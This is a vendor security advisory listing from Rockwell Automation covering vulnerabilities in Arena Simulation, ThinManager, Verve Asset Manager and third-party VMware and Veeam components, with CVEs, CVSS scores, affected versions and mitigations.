Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 8/5/2025
Last Updated: 8/5/2025
Revision Number: 1.0
CVSS Score: 8.4/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	CVE	First Known in Software Version	Corrected in Software Version
Arena® Simulation	CVE-2025-7025	16.20.09 and prior	16.20.10 and later
	CVE-2025-7032	16.20.09 and prior	16.20.10 and later
	CVE-2025-7033	16.20.09 and prior	16.20.10 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following security issues. The vulnerabilities were reported by Michael Heinzl.

CVE-2025-7025 IMPACT

A memory abuse issue exists in the affected product. A custom file can force Arena Simulation to read and write past the end of memory space. Successful use requires user action, such as opening a bad file or webpage. If used, a threat actor could execute code or disclose information.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.4
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-125 Out-of-bounds Read
Known Exploited Vulnerability (KEV) database: No

CVE-2025-7032 IMPACT

A memory abuse issue exists in the affected product. A custom file can force Arena Simulation to read and write past the end of memory space. Successful use requires user action, such as opening a bad file or webpage. If used, a threat actor could execute code or disclose information.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.4
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-121: Stack-based Buffer Overflow
Known Exploited Vulnerability (KEV) database: No

CVE-2025-7033 IMPACT

A memory abuse issue exists in the affected product. A custom file can force Arena Simulation to read and write past the end of memory space. Successful use requires user action, such as opening a bad file or webpage. If used, a threat actor could execute code or disclose information.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.4
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-122: Heap-based Buffer Overflow
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied.

· Security Best Practices

Glossary

· Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

· Arbitrary Code Execution: an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process

Critical

SD1730 | Lifecycle Services with VMware are Vulnerable to third-party Vulnerabilities (CVE-2025-41236, CVE-2025-41237, CVE-2025-41238, CVE-2025-41239)

Published Date:

July 16, 2025

Last Updated:

July 16, 2025

CVE IDs:

CVE-2025-41236, CVE-2025-41237, CVE-2025-41238, CVE-2025-41239

CVSS Scores (v3.1):

9.3, 7.1

CVSS Scores (v4.0):

9.4, 8.2

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 7/16/2025

Last updated:7/16/2025

Revision Number: 1.0

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found through a third-party advisory and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Versions	Corrected in software version
Industrial Data Center (IDC) with VMware	Generations 1 – 4	Refer to Mitigations and Workarounds
VersaVirtual Appliance (VVA) with VMware	Series A & B	Refer to Mitigations and Workarounds
Threat Detection Managed Services (TDMS) with VMware	All	Refer to Mitigations and Workarounds
Endpoint Protection Service with Rockwell Automation Proxy & VMware only	All	Refer to Mitigations and Workarounds
Engineered and Integrated Solutions with VMware	All	Refer to Broadcom’s advisory

Remediations and Workarounds

Users with an active Rockwell Automation Infrastructure Managed Service contract or Threat Detection Managed Service contract:

Rockwell Automation will contact impacted users to discuss actions needed for remediation efforts.

Users without Rockwell Automation managed services contract, refer to Broadcom’s advisories below :

· Support Content Notification - Support Portal - Broadcom support portal

· https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-80u3f-release-notes.html

· https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-80u2e-release-notes.html

· https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-70u3w-release-notes.html

Additionally, users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.

· Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used v3.1 and v4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-41236

An integer-overflow vulnerability exists in the VMXNET3 virtual network adapter used in VMware ESXi, Workstation, and Fusion. Exploitation of this vulnerability can lead to code execution on the host.

CVSS 3.1 Base Score: 9.3

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.4

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database: No

CVE-2025-41237

An integer-underflow vulnerability exists in the Virtual Machine Communication Interface (VMCI) of VMware ESXi, Workstation, and Fusion, which can lead to an out-of-bounds write. Exploitation of this vulnerability can lead to code execution on the host.

CVSS 3.1 Base Score: 9.3

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.4

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database: No

CVE-2025-41238

A heap-overflow vulnerability exists in the Paravirtualized SCSI (PVSCSI) controller of VMware ESXi, Workstation, and Fusion, which can lead to an out-of-bounds write. Exploitation of this vulnerability can lead to code execution on the host.

CVSS 3.1 Base Score: 9.3

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.4

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database: No

CVE-2025-41239

An information disclosure vulnerability exists in vSockets due to the use of uninitialized memory in VMware ESXi, Workstation, Fusion, and VMware Tools. Exploitation of this vulnerability can result in the leakage of memory from processes communicating with vSockets.

CVSS 3.1 Base Score: 7.1

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 4.0 Base Score: 8.2

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

Glossary:

VMXNET3: virtual network adapter optimized for VMware environments
VMware ESXi: hypervisor that enables virtualization of servers
VMware Workstation: desktop application that allows users to run multiple operating systems as virtual machines on a single PC
VMware Fusion: a macOS application that enables users to run Windows and other operating systems within a virtual environment
Code execution: an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process
Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

High

SD1729 | Arena® Simulation Out-Of-Bounds Write Remote Code Execution Vulnerability

Published Date:

July 09, 2025

Last Updated:

July 09, 2025

CVE IDs:

CVE-2025-6377 , CVE-2025-6376

Products:

Arena®

CVSS Scores (v3.1):

7.0, 7.8

CVSS Scores (v4.0):

8.4, 7.1

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 7/9/2025
Last Updated: 7/9/2025
Revision Number: 1.0
CVSS Score: 7.1/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	CVE	First Known in Software Version	Corrected in Software Version
Software - Arena®	CVE-2025-6377	16.20.08 and earlier	16.20.09 and later
Software - Arena®	CVE-2025-6376	16.20.08 and earlier	16.20.09 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerability. The vulnerability was reported by Zero Day Initiative (ZDI).

CVE-2025-6377 IMPACT

A remote code execution security issue exists in the affected product. A crafted DOE file can force Arena Simulation to write beyond the boundaries of an allocated object. Exploitation requires user interaction, such as opening a malicious file within the software. If exploited, a threat actor could execute arbitrary code on the target system. The software must run under the context of the administrator in order to cause worse case impact. This is reflected in the Rockwell CVSS score, as AT:P.

ZDI CVSS Score

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.4

CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Rockwell CVSS Score:

CVSS 3.1 Base Score: 7.0
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.1
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20 Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

CVE-2025-6376 IMPACT

A remote code execution security issue exists in the affected product. A crafted DOE file can force Arena Simulation to write beyond the boundaries of an allocated object. Exploitation requires user interaction, such as opening a malicious file within the software. If exploited, a threat actor could execute arbitrary code on the target system. The software must run under the context of the administrator in order to cause worse case impact. This is reflected in the Rockwell CVSS score, as AT:P.

ZDI CVSS Score

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.4

CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Rockwell CVSS Score

CVSS 3.1 Base Score: 7.0
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.1
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20 Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied.

·         Security Best Practices

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Glossary

DOE File: A DOE file, or Design of Experiments file, is a document used to plan and organize an experiment efficiently. It helps in systematically arranging tests and analyzing the effects of multiple factors and their interactions on a response variable.

Arbitrary Code Execution: an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Critical

SD1728 | Apache Vulnerability in FactoryTalk® Historian-ThingWorx Connection Server

Published Date:

May 14, 2025

Last Updated:

May 14, 2025

CVE IDs:

CVE-2018-1285

CVSS Scores (v3.1):

9.8

CVSS Scores (v4.0):

9.3

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 5/15/2025

Last updated: 5/15/2025

Revision Number: 1.0

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in software version	Corrected in software version
95057C-FTHTWXCT11	<= v4.02.00	v5.00.00 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2018-1285

A vulnerability has been identified in the third-party Apache log4net software, impacting the FactoryTalk® Historian-ThingWorx Connector. This issue arises because versions of Apache log4net prior to 2.0.10 fail to disable XML external entities during the parsing of log4net configuration files. Consequently, a threat actor could exploit this to launch XX-based attacks on applications that accept malicious log4net configuration files.

CVSS 3.1 Base Score: 9.8

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: no

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Update to the corrected version if possible. Additionally, users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.

· Security Best Practices

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

High

SD1727 | Local Privilege Escalation and denial-of-service Vulnerability in ThinManager®

Published Date:

April 15, 2025

Last Updated:

April 23, 2025

CVE IDs:

CVE-2025-3617 , CVE-2025-3618

CVSS Scores (v3.1):

7.8

CVSS Scores (v4.0):

8.5

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

AFFECTED PRODUCTS AND SOLUTION

Affected Product	CVE	First Known in Software Version	Corrected in Software Version
Software - ThinManager	CVE-2025-3617	14.0.0 & 14.0.1	v14.0.2 and later
Software - ThinManager	CVE-2025-3618	v14.0.1 and earlier	v11.2.11, 12.0.9, 12.1.10, 13.0.7, 13.1.5, 13.2.4, 14.0.2 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by Zero Day Initiative (ZDI).

CVE-2025-3617 IMPACT

A privilege escalation vulnerability exists in the affected product. When the software starts up, files are deleted in the temporary folder causing the Access Control Entry of the directory to inherit permissions from the parent directory. If exploited, a threat actor could inherit elevated privileges.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: 276 - Incorrect Default Permissions
Known Exploited Vulnerability (KEV) database: No

CVE-2025-3618 IMPACT

A denial-of-service vulnerability exists in the affected product. The software fails to adequately verify the outcome of memory allocation while processing Type 18 messages. If exploited, a threat actor could cause a denial-of-service on the target software.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: 119 - Improper Restriction of Operations within the Bounds of a Memory Buffer
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High

SD1726 | Local Code Execution Vulnerabilities in Arena®

Published Date:

April 07, 2025

Last Updated:

April 07, 2025

CVE IDs:

CVE-2025-2285, CVE-2025-2286, CVE-2025-2287, CVE-2025-2288, CVE-2025-2293, CVE-2025-2829, CVE-2025-3285, CVE-2025-3286, CVE-2025-3287, CVE-2025-3288, CVE-2025-3289

CVSS Scores (v3.1):

7.8

CVSS Scores (v4.0):

8.5

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 4/8/2025

Last updated: 4/8/2025

Revision Number: 1.0

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in software version	Corrected in software version
Arena®	16.20.08 and earlier	16.20.09

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by Michael Heinzl.

CVE-2025-2285

A local code execution vulnerability exists in the affected products due to an uninitialized pointer. The flaw is result of improper validation of user-supplied data. If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE- 457 Uninitialized Variable

CVE-2025-2286

A local code execution vulnerability exists in the affected products due to an uninitialized pointer. The flaw is result of improper validation of user-supplied data. If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE- 457 Uninitialized Variable

CVE-2025-2287

A local code execution vulnerability exists in the affected products due to an uninitialized pointer. The flaw is result of improper validation of user-supplied data. If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE- 457 Uninitialized Variable

CVE-2025-2288

A local code execution vulnerability exists in the affected products due to a threat actor being able to write outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5

CVSS Vector:CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE 787 - Out of Bounds Write

CVE-2025-2293

A local code execution vulnerability exists in the affected products due to a threat actor being able to write outside of the allocated memory buffer. The flaw is result of improper validation of user-supplied data. If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE 787 - Out of Bounds Write

CVE-2025-2829

A local code execution vulnerability exists in the affected products due to a threat actor being able to write outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE 787 - Out of Bounds Write

CVE-2025-3285

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-125 Out of Bounds Read

CVE-2025-3286

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is result of improper validation of user-supplied data. If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-125 Out of Bounds Read

CVE-2025-3287

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is result of improper validation of user-supplied data. If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-125 Out of Bounds Read

CVE-2025-3288

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is result of improper validation of user-supplied data. If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-125 Out of Bounds Read

CVE-2025-3289

A local code execution vulnerability exists in the affected products due to a stack-based memory buffer overflow. The flaw is result of improper validation of user-supplied data. If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE 121 – Stack-based Buffer Overflow

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Additionally, users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.

· Security Best Practices

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

High

SD1725 | Third-party Local Code Execution Vulnerability in 440G TLS-Z

Published Date:

March 24, 2025

Last Updated:

March 24, 2025

CVE IDs:

CVE-2020-27212

Products:

440G TLS-Z

CVSS Scores (v3.1):

7.0

CVSS Scores (v4.0):

7.3

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

Yes

More Details Less Details

Published Date: 3/25/2025

Revision Number: 1.0

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Versions	Corrected in Software Version
440G TLS-Z	v6.001	n/a – see mitigations

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· Limit physical access to authorized personnel: Control room, cells/areas, control panels, and devices. See Chapter 4, Harden the Control System of System Security Design Guidelines

· For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE 2020-27212 IMPACT

A local code execution vulnerability exists in the STMicroelectronics STM32L4 devices due to having incorrect access controls. The affected product utilizes the STMicroelectronics STM32L4 device and because of the vulnerability, a threat actor could reverse protections that control access to the JTAG interface. If exploited, a threat actor can take over the device.

CVSS 3.1 Base Score: 7.0
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.3
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:1395-Dependency of a third-party Component & CWE 74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

CPE: cpe:2.3:h:st:stm32l431rc:-:*:*:*:*:*:*:*

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Critical

SD1724 | Lifecycle Services with Veeam Backup and Replication are Vulnerable to third-party Vulnerabilities

Published Date:

March 21, 2025

Last Updated:

March 21, 2025

CVE IDs:

CVE-2025-23120

CVSS Scores (v3.1):

9.9

CVSS Scores (v4.0):

9.4

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

Lifecycle Services with Veeam Backup and Replication are Vulnerable to third-party Vulnerabilities

Published Date: 03/21/25

Last updated: 03/27/25

Revision Number: 1.0

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found through a third-party advisory and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Versions	Corrected in Software Revision
Industrial Data Center (IDC) with Veeam	Generations 1 – 5	Refer to Remediation and Workarounds
VersaVirtual™ Appliance (VVA) with Veeam	Series A - C	Refer to Remediation and Workarounds

REMEDIATIONS AND WORKAROUNDS

Users with an active Rockwell Automation Infrastructure Managed Service contract:

Rockwell Automation will contact impacted users to discuss actions needed for remediation efforts.

Users without Rockwell Automation managed services contract, refer to Veeam’s advisories below:

· Support Content Notification - Support Portal – Veeam support portal

· https://www.veeam.com/kb4724

Additionally, users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.

· Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used v3.1 and v4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-23120

A remote code execution vulnerability exists in Veeam Backup & Replication, which the affected products use. Exploitation of the vulnerability can allow a threat actor to execute code on the target system.

CVSS 3.1 Base Score: 9.9

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.4

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database: No

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

Critical

SD1723 | Admin Shell Access Vulnerability in Verve Asset Manager

Published Date:

March 20, 2025

Last Updated:

March 20, 2025

CVE IDs:

CVE-2025-1449

CVSS Scores (v3.1):

9.1

CVSS Scores (v4.0):

8.9

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 3/25/25

Revision Number: 1.0

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Version(s)

Corrected in Software Revision

Verve Asset Manager

<=1.39

V1.40

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-1449 IMPACT

A vulnerability exists in the affected product due to insufficient variable sanitizing. A portion of the administrative web interface for Verve's Legacy Agentless Device Inventory (ADI) capability (deprecated since the 1.36 release) allows users to change a variable with inadequate sanitizing. If exploited, it could allow a threat actor with administrative access to run arbitrary commands in the context of the container running the service.

CVSS Base Score v3.1: 9.1

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVSS Base Score v4.0: 8.9

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

